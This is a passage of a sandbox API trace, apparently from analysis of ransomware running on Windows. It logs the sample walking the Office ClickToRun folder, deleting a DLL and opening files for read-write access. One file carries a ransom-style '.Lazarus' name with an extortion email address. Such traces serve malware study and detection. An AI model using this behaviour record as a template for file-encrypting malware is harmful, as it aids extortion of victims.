dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 92 [0091.107] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll")) returned 1 [0091.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0091.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0091.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0091.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0091.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0091.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0091.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0091.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0091.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0091.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0091.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0091.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0091.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.109] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb979f700, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x27c40, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="ApiClient.dll", cAlternateFileName="APICLI~1.DLL")) returned 1 [0091.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0091.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0091.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0091.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0091.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0091.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0091.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0091.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0091.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0091.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.158] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.158] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.158] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0091.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.159] AreFileApisANSI () returned 1 [0091.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll", lpUsedDefaultChar=0x0) returned 72 [0091.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0091.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.159] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0091.159] AreFileApisANSI () returned 1 [0091.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0091.159] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0091.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 72 [0091.159] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.159] GetFileType (hFile=0x33c) returned 0x1 [0091.159] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0091.159] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0091.160] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0091.160] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0091.160] CloseHandle (hObject=0x33c) returned 1 [0091.160] AreFileApisANSI () returned 1 [0091.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0091.160] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0091.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 72 [0091.160] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.160] GetLastError () returned 0x20 [0091.160] GetLastError () returned 0x20 [0091.161] SetLastError (dwErrCode=0x20) [0091.161] GetLastError () returned 0x20 [0091.161] SetLastError (dwErrCode=0x20) [0091.161] GetLastError () returned 0x20 [0091.161] SetLastError (dwErrCode=0x20) [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0091.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.161] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.161] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9bc01200, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0xa02d8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="AppVCatalog.dll", cAlternateFileName="APPVCA~1.DLL")) returned 1 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0091.161] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.161] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0091.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.162] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.162] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.162] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.162] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0091.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.162] AreFileApisANSI () returned 1 [0091.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll", lpUsedDefaultChar=0x0) returned 74 [0091.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0091.162] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.162] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0091.162] AreFileApisANSI () returned 1 [0091.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0091.162] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85260 [0091.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 74 [0091.162] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.162] GetFileType (hFile=0x33c) returned 0x1 [0091.162] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0091.163] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0091.163] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0091.163] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0091.163] CloseHandle (hObject=0x33c) returned 1 [0091.163] AreFileApisANSI () returned 1 [0091.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0091.163] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x84fe0 [0091.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 74 [0091.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.164] GetLastError () returned 0x20 [0091.164] GetLastError () returned 0x20 [0091.164] SetLastError (dwErrCode=0x20) [0091.164] GetLastError () returned 0x20 [0091.164] SetLastError (dwErrCode=0x20) [0091.164] GetLastError () returned 0x20 [0091.164] SetLastError (dwErrCode=0x20) [0091.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0091.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0091.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.164] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0091.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.164] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.164] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8f1b08c9, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x1f5ad8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="appvcleaner.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cAlternateFileName="APPVCL~1.LAZ")) returned 1 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ef0 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ef0 | out: hHeap=0x20000) returned 1 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d370 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x4ebc8 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d028 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c500 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0091.188] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x110) returned 0x8bd10 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0091.188] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0091.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x110) returned 0x8b680 [0091.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0091.189] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.189] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.189] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.189] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0091.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0091.189] AreFileApisANSI () returned 1 [0091.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", lpUsedDefaultChar=0x0) returned 136 [0091.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0091.189] InitOnceExecuteOnce 